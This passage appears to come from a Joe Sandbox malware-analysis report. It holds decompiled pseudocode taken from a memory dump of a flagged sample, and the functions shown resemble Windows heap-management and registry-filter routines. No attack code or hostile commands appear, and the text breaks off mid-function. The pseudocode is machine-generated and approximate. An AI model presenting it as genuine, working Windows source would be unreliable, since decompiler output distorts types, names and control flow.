                                                        • Opcode ID: 7be0876f313bcd62ff2b734cc3091c8d7418e2ae3aac732aefec9a3d1f504d5b
                                                        • Instruction ID: 9ca3532b29160701b7ef7ad7f16cb1f01a154b2d35e36116abf7bba0dc22f77a
                                                        • Opcode Fuzzy Hash: 7be0876f313bcd62ff2b734cc3091c8d7418e2ae3aac732aefec9a3d1f504d5b
                                                        • Instruction Fuzzy Hash: D5E1AD7460060ADFDB6ACF68C894B7ABBB6FF44304F1441A9E512DB391DB34EA41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E017E8239(signed int* __ecx, char* __edx, signed int _a4) {
                                                        				signed int _v12;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				char _v560;
                                                        				signed int _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				intOrPtr _v576;
                                                        				short _v578;
                                                        				char _v580;
                                                        				signed int _v584;
                                                        				intOrPtr _v586;
                                                        				char _v588;
                                                        				char* _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr _v600;
                                                        				char* _v604;
                                                        				signed int* _v608;
                                                        				intOrPtr _v612;
                                                        				short _v614;
                                                        				char _v616;
                                                        				signed int _v620;
                                                        				signed int _v624;
                                                        				intOrPtr _v628;
                                                        				char* _v632;
                                                        				signed int _v636;
                                                        				char _v640;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				char _t94;
                                                        				char* _t99;
                                                        				intOrPtr _t118;
                                                        				intOrPtr _t122;
                                                        				intOrPtr _t125;
                                                        				short _t126;
                                                        				signed int* _t137;
                                                        				intOrPtr _t138;
                                                        				intOrPtr _t143;
                                                        				intOrPtr _t145;
                                                        				intOrPtr _t148;
                                                        				signed int _t150;
                                                        				signed int _t151;
                                                        				void* _t152;
                                                        				signed int _t154;
                                                        
                                                        				_t149 = __edx;
                                                        				_v12 =  *0x18dd360 ^ _t154;
                                                        				_v564 = _v564 & 0x00000000;
                                                        				_t151 = _a4;
                                                        				_t137 = __ecx;
                                                        				_v604 = __edx;
                                                        				_v608 = __ecx;
                                                        				_t150 = 0;
                                                        				_v568 = 0x220;
                                                        				_v592 =  &_v560;
                                                        				if(E017F6D30( &_v580, L"UseFilter") < 0) {
                                                        					L4:
                                                        					return E0182B640(_t89, _t137, _v12 ^ _t154, _t149, _t150, _t151);
                                                        				}
                                                        				_push( &_v572);
                                                        				_push(0x220);
                                                        				_push( &_v560);
                                                        				_push(2);
                                                        				_push( &_v580);
                                                        				_push( *_t137);
                                                        				_t89 = E01829650();
                                                        				if(_t89 >= 0) {
                                                        					if(_v556 != 4 || _v552 != 4 || _v548 == 0) {
                                                        						L3:
                                                        						_t89 = 0;
                                                        					} else {
                                                        						_t94 =  *_t151;
                                                        						_t151 =  *(_t151 + 4);
                                                        						_v588 = _t94;
                                                        						_v584 = _t151;
                                                        						if(E017F6D30( &_v580, L"\\??\\") < 0) {
                                                        							goto L4;
                                                        						}
                                                        						if(E017FAA20( &_v560,  &_v580,  &_v588, 1) != 0) {
                                                        							_v588 = _v588 + 0xfff8;
                                                        							_v586 = _v586 + 0xfff8;
                                                        							_v584 = _t151 + 8;
                                                        						}
                                                        						_t99 =  &_v560;
                                                        						_t143 = 0;
                                                        						_v596 = _t99;
                                                        						_v600 = 0;
                                                        						do {
                                                        							_t149 =  &_v572;
                                                        							_push( &_v572);
                                                        							_push(_v568);
                                                        							_push(_t99);
                                                        							_push(0);
                                                        							_push(_t143);
                                                        							_push( *_t137);
                                                        							_t151 = E01829820();
                                                        							if(_t151 < 0) {
                                                        								goto L37;
                                                        							}
                                                        							_t145 = _v596;
                                                        							_v580 =  *((intOrPtr*)(_t145 + 0xc));
                                                        							_v624 = _v624 & 0x00000000;
                                                        							_v620 = _v620 & 0x00000000;
                                                        							_v578 =  *((intOrPtr*)(_t145 + 0xc));
                                                        							_v576 = _t145 + 0x10;
                                                        							_v636 =  *_t137;
                                                        							_v632 =  &_v580;
                                                        							_push( &_v640);
                                                        							_push(_v604);
                                                        							_v640 = 0x18;
                                                        							_push( &_v564);
                                                        							_v628 = 0x240;
                                                        							_t151 = E01829600();
                                                        							if(_t151 < 0) {
                                                        								goto L37;
                                                        							}
                                                        							_t151 = E017F6D30( &_v580, L"FilterFullPath");
                                                        							if(_t151 < 0) {
                                                        								L36:
                                                        								_push(_v564);
                                                        								E018295D0();
                                                        								goto L37;
                                                        							}
                                                        							_t138 = _v592;
                                                        							_t118 = _v568;
                                                        							do {
                                                        								_push( &_v572);
                                                        								_push(_t118);
                                                        								_push(_t138);
                                                        								_push(2);
                                                        								_push( &_v580);
                                                        								_push(_v564);
                                                        								_t152 = E01829650();
                                                        								if(_t152 == 0x80000005 || _t152 == 0xc0000023) {
                                                        									if(_t150 != 0) {
                                                        										L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
                                                        									}
                                                        									_t147 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                        									if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                        										_t122 =  *0x18d7b9c; // 0x0
                                                        										_t150 = E01804620(_t147, _t147, _t122 + 0x180000, _v572);
                                                        										if(_t150 == 0) {
                                                        											goto L25;
                                                        										}
                                                        										_t118 = _v572;
                                                        										_t138 = _t150;
                                                        										_v596 = _t150;
                                                        										_v568 = _t118;
                                                        										goto L27;
                                                        									} else {
                                                        										_t150 = 0;
                                                        										L25:
                                                        										_t151 = 0xc0000017;
                                                        										goto L26;
                                                        									}
                                                        								} else {
                                                        									L26:
                                                        									_t118 = _v568;
                                                        								}
                                                        								L27:
                                                        							} while (_t151 == 0x80000005 || _t151 == 0xc0000023);
                                                        							_v592 = _t138;
                                                        							_t137 = _v608;
                                                        							if(_t151 >= 0) {
                                                        								_t148 = _v592;
                                                        								if( *((intOrPtr*)(_t148 + 4)) != 1) {
                                                        									goto L36;
                                                        								}
                                                        								_t125 =  *((intOrPtr*)(_t148 + 8));
                                                        								if(_t125 > 0xfffe) {
                                                        									goto L36;
                                                        								}
                                                        								_t126 = _t125 + 0xfffffffe;
                                                        								_v616 = _t126;
                                                        								_v614 = _t126;
                                                        								_v612 = _t148 + 0xc;
                                                        								if(E017F9660( &_v588,  &_v616, 1) == 0) {
                                                        									break;
                                                        								}
                                                        								goto L36;
                                                        							}
                                                        							_push(_v564);
                                                        							E018295D0();
                                                        							_t65 = _t151 + 0x3fffffcc; // 0x3fffffcc
                                                        							asm("sbb eax, eax");
                                                        							_t151 = _t151 &  ~_t65;
                                                        							L37:
                                                        							_t99 = _v596;
                                                        							_t143 = _v600 + 1;
                                                        							_v600 = _t143;
                                                        						} while (_t151 >= 0);
                                                        						if(_t150 != 0) {
                                                        							L018077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
                                                        						}
                                                        						if(_t151 >= 0) {
                                                        							_push( *_t137);
                                                        							E018295D0();
                                                        							 *_t137 = _v564;
                                                        						}
                                                        						_t85 = _t151 + 0x7fffffe6; // 0x7fffffe6
                                                        						asm("sbb eax, eax");
                                                        						_t89 =  ~_t85 & _t151;
                                                        					}
                                                        					goto L4;
                                                        				}
                                                        				if(_t89 != 0xc0000034) {
                                                        					if(_t89 == 0xc0000023) {
                                                        						goto L3;
                                                        					}
                                                        					if(_t89 != 0x80000005) {
                                                        						goto L4;
                                                        					}
                                                        				}
                                                        				goto L3;
                                                        			}

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        • Opcode ID: fcde0fca8928631c2377217a1f15bf3348cce76cef084769f42dfa77b15cd473
                                                        • Instruction ID: 04b5940e29d25bf2516ee3383c81a1d006a07be6af0b800bb10b1cefc5499798
                                                        • Opcode Fuzzy Hash: fcde0fca8928631c2377217a1f15bf3348cce76cef084769f42dfa77b15cd473
                                                        • Instruction Fuzzy Hash: F0A129719116299BDB31DB68CC88BAAF7B8EF48714F1001E9EA08E7251DB359F84CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 80%
                                                        			E0181AC7B(void* __ecx, signed short* __edx) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				void* __ebx;
                                                        				signed char _t75;
                                                        				signed int _t79;
                                                        				signed int _t88;
                                                        				intOrPtr _t89;
                                                        				signed int _t96;
                                                        				signed char* _t97;
                                                        				intOrPtr _t98;
                                                        				signed int _t101;
                                                        				signed char* _t102;
                                                        				intOrPtr _t103;
                                                        				signed int _t105;
                                                        				signed char* _t106;
                                                        				signed int _t131;
                                                        				signed int _t138;
                                                        				void* _t149;
                                                        				signed short* _t150;
                                                        
                                                        				_t150 = __edx;
                                                        				_t149 = __ecx;
                                                        				_t70 =  *__edx & 0x0000ffff;
                                                        				__edx[1] = __edx[1] & 0x000000f8;
                                                        				__edx[3] = 0;
                                                        				_v8 =  *__edx & 0x0000ffff;
                                                        				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                                        					_t39 =  &(_t150[8]); // 0x8
                                                        					E0183D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                                        					__edx[1] = __edx[1] | 0x00000004;
                                                        				}
                                                        				_t75 =  *(_t149 + 0xcc) ^  *0x18d8a68;
                                                        				if(_t75 != 0) {
                                                        					L4:
                                                        					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                        						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                                        						_t79 =  *(_t149 + 0x50);
                                                        						 *_t150 =  *_t150 ^ _t79;
                                                        						return _t79;
                                                        					}
                                                        					return _t75;
                                                        				} else {
                                                        					_t9 =  &(_t150[0x80f]); // 0x1017
                                                        					_t138 = _t9 & 0xfffff000;
                                                        					_t10 =  &(_t150[0x14]); // 0x20
                                                        					_v12 = _t138;
                                                        					if(_t138 == _t10) {
                                                        						_t138 = _t138 + 0x1000;
                                                        						_v12 = _t138;
                                                        					}
                                                        					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                                        					if(_t75 > _t138) {
                                                        						_v8 = _t75 - _t138;
                                                        						_push(0x4000);
                                                        						_push( &_v8);
                                                        						_push( &_v12);
                                                        						_push(0xffffffff);
                                                        						_t131 = E018296E0();
                                                        						__eflags = _t131 - 0xc0000045;
                                                        						if(_t131 == 0xc0000045) {
                                                        							_t88 = E01893C60(_v12, _v8);
                                                        							__eflags = _t88;
                                                        							if(_t88 != 0) {
                                                        								_push(0x4000);
                                                        								_push( &_v8);
                                                        								_push( &_v12);
                                                        								_push(0xffffffff);
                                                        								_t131 = E018296E0();
                                                        							}
                                                        						}
                                                        						_t89 =  *[fs:0x30];
                                                        						__eflags = _t131;
                                                        						if(_t131 < 0) {
                                                        							__eflags =  *(_t89 + 0xc);
                                                        							if( *(_t89 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E017EB150();
                                                        							} else {
                                                        								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push(_v8);
                                                        							_push(_v12);
                                                        							_push(_t149);
                                                        							_t75 = E017EB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                                        							goto L4;
                                                        						} else {
                                                        							_t96 =  *(_t89 + 0x50);
                                                        							_t132 = 0x7ffe0380;
                                                        							__eflags = _t96;
                                                        							if(_t96 != 0) {
                                                        								__eflags =  *_t96;
                                                        								if( *_t96 == 0) {
                                                        									goto L10;
                                                        								}
                                                        								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                        								L11:
                                                        								__eflags =  *_t97;
                                                        								if( *_t97 != 0) {
                                                        									_t98 =  *[fs:0x30];
                                                        									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                                        									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                                        										E018A14FB(_t132, _t149, _v12, _v8, 7);
                                                        									}
                                                        								}
                                                        								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                                        								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                                        								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                                        								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                                        								_t101 =  *( *[fs:0x30] + 0x50);
                                                        								__eflags = _t101;
                                                        								if(_t101 != 0) {
                                                        									__eflags =  *_t101;
                                                        									if( *_t101 == 0) {
                                                        										goto L13;
                                                        									}
                                                        									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                        									goto L14;
                                                        								} else {
                                                        									L13:
                                                        									_t102 = _t132;
                                                        									L14:
                                                        									__eflags =  *_t102;
                                                        									if( *_t102 != 0) {
                                                        										_t103 =  *[fs:0x30];
                                                        										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                                        										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                                        											__eflags = E01807D50();
                                                        											if(__eflags != 0) {
                                                        												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                        												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                                        											}
                                                        											E018A1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                                        										}
                                                        									}
                                                        									_t133 = 0x7ffe038a;
                                                        									_t105 =  *( *[fs:0x30] + 0x50);
                                                        									__eflags = _t105;
                                                        									if(_t105 != 0) {
                                                        										__eflags =  *_t105;
                                                        										if( *_t105 == 0) {
                                                        											goto L16;
                                                        										}
                                                        										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                        										goto L17;
                                                        									} else {
                                                        										L16:
                                                        										_t106 = _t133;
                                                        										L17:
                                                        										__eflags =  *_t106;
                                                        										if( *_t106 != 0) {
                                                        											__eflags = E01807D50();
                                                        											if(__eflags != 0) {
                                                        												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
                                                        												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
                                                        											}
                                                        											E018A1411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
                                                        										}
                                                        										_t75 = _t150[1] & 0x00000013 | 0x00000008;
                                                        										_t150[1] = _t75;
                                                        										goto L4;
                                                        									}
                                                        								}
                                                        							}
                                                        							L10:
                                                        							_t97 = _t132;
                                                        							goto L11;
                                                        						}
                                                        					} else {
                                                        						goto L4;
                                                        					}
                                                        				}
                                                        			}

                                                        Strings
                                                        • HEAP: , xrefs: 0185A0BA
                                                        • HEAP[%wZ]: , xrefs: 0185A0AD
                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0185A0CD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                        • API String ID: 0-1340214556
                                                        • Opcode ID: 1ca4cad3c395e9cec7397fa3782669a0e486bf6872972ede1570624751d43783
                                                        • Instruction ID: 070e49899619ae480755ca50955ba39e404496199fe8dc7a8f1f301f55aa5fd0
                                                        • Opcode Fuzzy Hash: 1ca4cad3c395e9cec7397fa3782669a0e486bf6872972ede1570624751d43783
                                                        • Instruction Fuzzy Hash: 9F81F672601A85EFE72ACBACC894BA9BBF8FF04714F0441A5E941C7696D774EB40CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E018923E3(signed int __ecx, unsigned int __edx) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _t42;
                                                        				char _t43;
                                                        				signed short _t44;
                                                        				signed short _t48;
                                                        				signed char _t51;
                                                        				signed short _t52;
                                                        				intOrPtr _t54;
                                                        				signed short _t64;
                                                        				signed short _t66;
                                                        				intOrPtr _t69;
                                                        				signed short _t73;
                                                        				signed short _t76;
                                                        				signed short _t77;
                                                        				signed short _t79;
                                                        				void* _t83;
                                                        				signed int _t84;
                                                        				signed int _t85;
                                                        				signed char _t94;
                                                        				unsigned int _t99;
                                                        				unsigned int _t104;
                                                        				signed int _t108;
                                                        				void* _t110;
                                                        				void* _t111;
                                                        				unsigned int _t114;
                                                        
                                                        				_t84 = __ecx;
                                                        				_push(__ecx);
                                                        				_t114 = __edx;
                                                        				_t42 =  *((intOrPtr*)(__edx + 7));
                                                        				if(_t42 == 1) {
                                                        					L49:
                                                        					_t43 = 1;
                                                        					L50:
                                                        					return _t43;
                                                        				}
                                                        				if(_t42 != 4) {
                                                        					if(_t42 >= 0) {
                                                        						if( *(__ecx + 0x4c) == 0) {
                                                        							_t44 =  *__edx & 0x0000ffff;
                                                        						} else {
                                                        							_t73 =  *__edx;
                                                        							if(( *(__ecx + 0x4c) & _t73) != 0) {
                                                        								_t73 = _t73 ^  *(__ecx + 0x50);
                                                        							}
                                                        							_t44 = _t73 & 0x0000ffff;
                                                        						}
                                                        					} else {
                                                        						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x18d874c ^ __ecx;
                                                        						if(_t104 == 0) {
                                                        							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
                                                        						} else {
                                                        							_t76 = 0;
                                                        						}
                                                        						_t44 =  *((intOrPtr*)(_t76 + 0x14));
                                                        					}
                                                        					_t94 =  *((intOrPtr*)(_t114 + 7));
                                                        					_t108 = _t44 & 0xffff;
                                                        					if(_t94 != 5) {
                                                        						if((_t94 & 0x00000040) == 0) {
                                                        							if((_t94 & 0x0000003f) == 0x3f) {
                                                        								if(_t94 >= 0) {
                                                        									if( *(_t84 + 0x4c) == 0) {
                                                        										_t48 =  *_t114 & 0x0000ffff;
                                                        									} else {
                                                        										_t66 =  *_t114;
                                                        										if(( *(_t84 + 0x4c) & _t66) != 0) {
                                                        											_t66 = _t66 ^  *(_t84 + 0x50);
                                                        										}
                                                        										_t48 = _t66 & 0x0000ffff;
                                                        									}
                                                        								} else {
                                                        									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x18d874c ^ _t84;
                                                        									if(_t99 == 0) {
                                                        										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
                                                        									} else {
                                                        										_t69 = 0;
                                                        									}
                                                        									_t48 =  *((intOrPtr*)(_t69 + 0x14));
                                                        								}
                                                        								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
                                                        							} else {
                                                        								_t85 = _t94 & 0x3f;
                                                        							}
                                                        						} else {
                                                        							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
                                                        						}
                                                        					} else {
                                                        						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
                                                        					}
                                                        					_t110 = (_t108 << 3) - _t85;
                                                        				} else {
                                                        					if( *(__ecx + 0x4c) == 0) {
                                                        						_t77 =  *__edx & 0x0000ffff;
                                                        					} else {
                                                        						_t79 =  *__edx;
                                                        						if(( *(__ecx + 0x4c) & _t79) != 0) {
                                                        							_t79 = _t79 ^  *(__ecx + 0x50);
                                                        						}
                                                        						_t77 = _t79 & 0x0000ffff;
                                                        					}
                                                        					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
                                                        				}
                                                        				_t51 =  *((intOrPtr*)(_t114 + 7));
                                                        				if(_t51 != 5) {
                                                        					if((_t51 & 0x00000040) == 0) {
                                                        						_t52 = 0;
                                                        						goto L42;
                                                        					}
                                                        					_t64 = _t51 & 0x3f;
                                                        					goto L38;
                                                        				} else {
                                                        					_t64 =  *(_t114 + 6) & 0x000000ff;
                                                        					L38:
                                                        					_t52 = _t64 << 0x00000003 & 0x0000ffff;
                                                        					L42:
                                                        					_t35 = _t114 + 8; // -16
                                                        					_t111 = _t110 + (_t52 & 0x0000ffff);
                                                        					_t83 = _t35 + _t111;
                                                        					_t54 = E0183D4F0(_t83, 0x17c6c58, 8);
                                                        					_v8 = _t54;
                                                        					if(_t54 == 8) {
                                                        						goto L49;
                                                        					}
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push("HEAP: ");
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					_push(_t111);
                                                        					_push(_v8 + _t83);
                                                        					E017EB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
                                                        					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                        						 *0x18d6378 = 1;
                                                        						asm("int3");
                                                        						 *0x18d6378 = 0;
                                                        					}
                                                        					_t43 = 0;
                                                        					goto L50;
                                                        				}
                                                        			}

                                                        Strings
                                                        • HEAP: , xrefs: 0189255C
                                                        • HEAP[%wZ]: , xrefs: 0189254F
                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0189256F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                        • API String ID: 0-3815128232
                                                        • Opcode ID: 42393e0f86b5d268311f76b5619942a9998a53c22680b2dd0f23126031ddcc95
                                                        • Instruction ID: 20101658c9ead2d45bbe9014cf44eb69ef39f2d170443e26b416f44388c92a51
                                                        • Opcode Fuzzy Hash: 42393e0f86b5d268311f76b5619942a9998a53c22680b2dd0f23126031ddcc95
                                                        • Instruction Fuzzy Hash: E251F334100254AAEB74DE1EC8D4772BBF3EB48748F59485DF8C2CB285D235DA46DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E0180EB9A(intOrPtr __ecx, intOrPtr* __edx) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				void* _t62;
                                                        				signed int _t63;
                                                        				intOrPtr _t64;
                                                        				signed int _t65;
                                                        				intOrPtr _t77;
                                                        				signed int* _t91;
                                                        				intOrPtr _t92;
                                                        				signed int _t95;
                                                        				signed char _t109;
                                                        				signed int _t114;
                                                        				unsigned int _t119;
                                                        				intOrPtr* _t122;
                                                        				intOrPtr _t127;
                                                        				signed int _t130;
                                                        				void* _t135;
                                                        
                                                        				_t92 = __ecx;
                                                        				_t122 = __edx;
                                                        				_v8 = __ecx;
                                                        				 *((intOrPtr*)(__ecx + 0xb4)) = __edx;
                                                        				if( *__edx != 0) {
                                                        					_t95 =  *((intOrPtr*)(__edx + 4)) -  *((intOrPtr*)(__edx + 0x14)) - 1;
                                                        					__eflags =  *(__edx + 8);
                                                        					if(__eflags != 0) {
                                                        						_t95 = _t95 + _t95;
                                                        					}
                                                        					 *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) =  *( *((intOrPtr*)(_t122 + 0x20)) + _t95 * 4) & 0x00000000;
                                                        					asm("btr eax, esi");
                                                        					_t92 = _v8;
                                                        				}
                                                        				_t62 = _t92 + 0xc0;
                                                        				_t127 =  *((intOrPtr*)(_t62 + 4));
                                                        				while(1) {
                                                        					L2:
                                                        					_v12 = _t127;
                                                        					if(_t62 == _t127) {
                                                        						break;
                                                        					}
                                                        					_t7 = _t127 - 8; // -8
                                                        					_t91 = _t7;
                                                        					if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
                                                        						_t119 =  *(_t92 + 0x50) ^  *_t91;
                                                        						 *_t91 = _t119;
                                                        						_t109 = _t119 >> 0x00000010 ^ _t119 >> 0x00000008 ^ _t119;
                                                        						if(_t119 >> 0x18 != _t109) {
                                                        							_push(_t109);
                                                        							E0189FA2B(_t91, _v8, _t91, _t122, _t127, __eflags);
                                                        						}
                                                        						_t92 = _v8;
                                                        					}
                                                        					_t114 =  *_t91 & 0x0000ffff;
                                                        					_t63 = _t122;
                                                        					_t135 = _t114 -  *((intOrPtr*)(_t122 + 4));
                                                        					while(1) {
                                                        						_v20 = _t63;
                                                        						if(_t135 < 0) {
                                                        							break;
                                                        						}
                                                        						_t130 =  *_t63;
                                                        						_v16 = _t130;
                                                        						_t127 = _v12;
                                                        						if(_t130 != 0) {
                                                        							_t63 = _v16;
                                                        							__eflags = _t114 -  *((intOrPtr*)(_t63 + 4));
                                                        							continue;
                                                        						}
                                                        						_v16 =  *((intOrPtr*)(_t63 + 4)) - 1;
                                                        						L10:
                                                        						if( *_t122 != 0) {
                                                        							_t64 =  *((intOrPtr*)(_t122 + 4));
                                                        							__eflags = _t114 - _t64;
                                                        							_t65 = _t64 - 1;
                                                        							__eflags = _t65;
                                                        							if(_t65 < 0) {
                                                        								_t65 = _t114;
                                                        							}
                                                        							E0180BC04(_t92, _t122, 1, _t127, _t65, _t114);
                                                        						}
                                                        						E0180E4A0(_v8, _v20, 1, _t127, _v16,  *_t91 & 0x0000ffff);
                                                        						if( *0x18d8748 >= 1) {
                                                        							__eflags =  *( *((intOrPtr*)(_v20 + 0x1c)) + (_v16 -  *((intOrPtr*)(_v20 + 0x14)) >> 5) * 4) & 1 << (_v16 -  *((intOrPtr*)(_v20 + 0x14)) & 0x0000001f);
                                                        							if(__eflags == 0) {
                                                        								_t77 =  *[fs:0x30];
                                                        								__eflags =  *(_t77 + 0xc);
                                                        								if( *(_t77 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
                                                        								E017EB150();
                                                        								__eflags =  *0x18d7bc8;
                                                        								if(__eflags == 0) {
                                                        									__eflags = 1;
                                                        									E018A2073(_t91, 1, _t122, 1);
                                                        								}
                                                        							}
                                                        							_t127 = _v12;
                                                        						}
                                                        						_t92 = _v8;
                                                        						if( *((intOrPtr*)(_t92 + 0x4c)) != 0) {
                                                        							_t91[0] = _t91[0] ^ _t91[0] ^  *_t91;
                                                        							 *_t91 =  *_t91 ^  *(_t92 + 0x50);
                                                        						}
                                                        						_t127 =  *((intOrPtr*)(_t127 + 4));
                                                        						_t62 = _t92 + 0xc0;
                                                        						goto L2;
                                                        					}
                                                        					_v16 = _t114;
                                                        					goto L10;
                                                        				}
                                                        				return _t62;
                                                        			}

                                                        Strings
                                                        • HEAP: , xrefs: 018542AF
                                                        • HEAP[%wZ]: , xrefs: 018542A2
                                                        • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 018542BA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                        • API String ID: 0-1596344177
                                                        • Opcode ID: 777930b6606dcd9a84f17ef74835d596c6f91b61d856104b7687168fc716de4b
                                                        • Instruction ID: 5e106ad5cabf0628bfdfb36a42a63a6a29f4ffe28f5c4425e8d09f8d9b040a60
                                                        • Opcode Fuzzy Hash: 777930b6606dcd9a84f17ef74835d596c6f91b61d856104b7687168fc716de4b
                                                        • Instruction Fuzzy Hash: 2D510E31A10529EFCB59DF58C884A6ABBF1FF84314F1584A9E805DB382D731EE42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 60%
                                                        			E0180B8E4(unsigned int __edx) {
                                                        				void* __ecx;
                                                        				void* __edi;
                                                        				intOrPtr* _t16;
                                                        				intOrPtr _t18;
                                                        				void* _t27;
                                                        				void* _t28;
                                                        				unsigned int _t30;
                                                        				intOrPtr* _t31;
                                                        				unsigned int _t38;
                                                        				void* _t39;
                                                        				unsigned int _t40;
                                                        
                                                        				_t40 = __edx;
                                                        				_t39 = _t28;
                                                        				if( *0x18d8748 >= 1) {
                                                        					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
                                                        					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
                                                        						_t18 =  *[fs:0x30];
                                                        						__eflags =  *(_t18 + 0xc);
                                                        						if( *(_t18 + 0xc) == 0) {
